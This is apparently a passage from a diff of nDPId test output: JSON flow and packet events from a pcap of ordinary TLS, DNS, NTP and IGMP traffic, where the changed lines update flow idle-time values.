CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} +01414{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1626168080569,"flow_last_seen":1626168080666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":1626168080666,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wdcp.microsoft.com","server_names":"wdcp.microsoft.com,spynet2.microsoft.com,wdcpalt.microsoft.com,spynetalt.microsoft.com,*.cp.wd.microsoft.com","ja3":"656b9a2f4de6ed4909e157482860ab3d","ja3s":"17e97216fa7f4ec8c43090c6eed97c25","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Secure Server CA 2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1626168080732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080732,"pkt":"WNVuaKQA8BiYFWV8CABFAABMaD0AAEARB0vAqAF5Ef02+94hAHsAOPLHIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168080732,"flow_last_seen":1626168080732,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168080732,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1626168080762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168080762,"pkt":"8BiYFWV8WNVuaKQACABFAABMWKVAADcR3+IR\/Tb7wKgBeQB73iEAOEmOJAED6wAAAAAAAAAOU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mQ0KMdvOSX2ZDQo9j2"} -00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1626168081935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168081935,"pkt":"8BiYFWV8WNVuaKQACABFAgBT\/jUAADoGG+iC0yGRwKgBeQG70LhXNR5OnF8A9oAYAQrx0QAAAQEICrTFhOw90eMiFwMDABoAAAAAAAAALjbyzjKtkrWGo0S+7wFfhufrwQ=="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1626168081936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAG1D7AqAF5gtMhkdC4AbucXwD2VzUebYAQCAChqQAAAQEICj3SCZ60xYTs"} -00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1626168081936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAgBXAABAAEAG1BnAqAF5gtMhkdC4AbucXwD2VzUebYAYCABxCwAAAQEICj3SCZ60xYTsFwMDAB6jdVHReZkUes0n0uJUluEta6fWXjhtBJq5oBbOx1I="} +00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168081935,"flow_last_seen":1626168081935,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1626168081935,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1626168081935,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168081935,"pkt":"8BiYFWV8WNVuaKQACABFAgBT\/jUAADoGG+iC0yGRwKgBeQG70LhXNR5OnF8A9oAYAQrx0QAAAQEICrTFhOw90eMiFwMDABoAAAAAAAAALjbyzjKtkrWGo0S+7wFfhufrwQ=="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1626168081936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAG1D7AqAF5gtMhkdC4AbucXwD2VzUebYAQCAChqQAAAQEICj3SCZ60xYTs"} +00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1626168081936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1626168081936,"pkt":"WNVuaKQA8BiYFWV8CABFAgBXAABAAEAG1BnAqAF5gtMhkdC4AbucXwD2VzUebYAYCABxCwAAAQEICj3SCZ60xYTsFwMDAB6jdVHReZkUes0n0uJUluEta6fWXjhtBJq5oBbOx1I="} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077441,"flow_last_seen":1626168077507,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} 00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1626168076607,"flow_last_seen":1626168076607,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.139","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} -00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} +00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077620,"flow_last_seen":1626168077673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2155,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} +00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077660,"flow_last_seen":1626168077704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":2392,"flow_avg_l4_payload_len":217,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077604,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077413,"flow_last_seen":1626168077486,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} @@ -193,27 +193,27 @@ 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080732,"flow_last_seen":1626168080762,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":56865,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168080092,"flow_last_seen":1626168080122,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":65099,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1626168075664,"flow_last_seen":1626168076674,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":1180,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1626168078673,"flow_last_seen":1626168079052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29308,"flow_avg_l4_payload_len":407,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1626168078673,"flow_last_seen":1626168078826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17628,"flow_avg_l4_payload_len":326,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168074745,"flow_last_seen":1626168074928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 